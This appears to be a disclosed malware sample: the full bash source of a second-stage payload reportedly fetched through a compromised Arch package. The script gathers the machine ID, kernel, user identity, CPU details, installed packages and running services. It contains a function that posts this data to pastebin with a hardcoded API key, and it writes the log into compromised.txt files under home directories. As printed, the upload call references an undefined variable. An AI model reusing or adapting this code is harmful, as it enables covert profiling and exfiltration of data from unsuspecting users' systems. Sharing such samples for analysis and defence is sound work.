~u file downloaded as 2nd stage payload in public Arch package compromise

~u

#!/bin/bash

function urle() {
	sed -e 's|!|%21|' -e 's|#|%23|' -e 's|$|%24|' -e 's|&|%26|' -e "s|'|%27|" -e 's|(|%28|' -e 's|)|%29|' -e 's|*|%2a|' -e 's|+|%2b|' -e 's|,|%2c|' -e 's|/|%2f|' -e 's|:|%3a|' -e 's|;|%3b|' -e 's|=|%3d|' -e 's|?|%3f|' -e 's|@|%40|' -e 's|\[|%5b|' -e 's|]|%5d|'
}
declare -fx urle
GID=
MACHINE_ID="$(cat /etc/machine-id)"
PASTE_TITLE="$(echo [xeactor]\ $MACHINE_ID|urle)"
upload() {
	up_data="$(echo $1|urle)"
	if [[ "$HTTP_CLIENT" == "curl" ]]; then
		prefix='curl -s --data'
	elif [[ "$HTTP_CLIENT" == "wget" ]]; then
		prefix='wget -O/dev/null -q --post-data'
	fi
	$prefix "api_dev_key=42ba93112cc9677382e55e5e387eafa1&api_paste_private=0&api_paste_name=${PASTE_TITLE}&api_option=paste&api_paste_code=$up_data" "https://pastebin.com/api/api_post.php" >/dev/null 2>&1
}
if which wget >/dev/null 2>&1; then
	export HTTP_CLIENT=wget
elif which curl >/dev/null 2>&1; then
	export HTTP_CLIENT=curl
else
	exit 0
fi
cmd_log() { echo "[cmd] \`$@\`:"; "$@" 2>&1; echo; }
full_log() {
	echo ${MACHINE_ID}
	cmd_log date '+%s'
	cmd_log uname -a
	cmd_log id
	cmd_log lscpu
	cmd_log pacman -Qeq
	cmd_log pacman -Qdq
	cmd_log systemctl list-units
}
FULL_LOG="$(full_log)"
$uploader "$FULL_LOG"
for x in /root /home/*; do
	if [[ -w "$x/compromised.txt" ]]; then
		echo "$FULL_LOG" > "$x/compromised.txt"
	fi
done
exit 0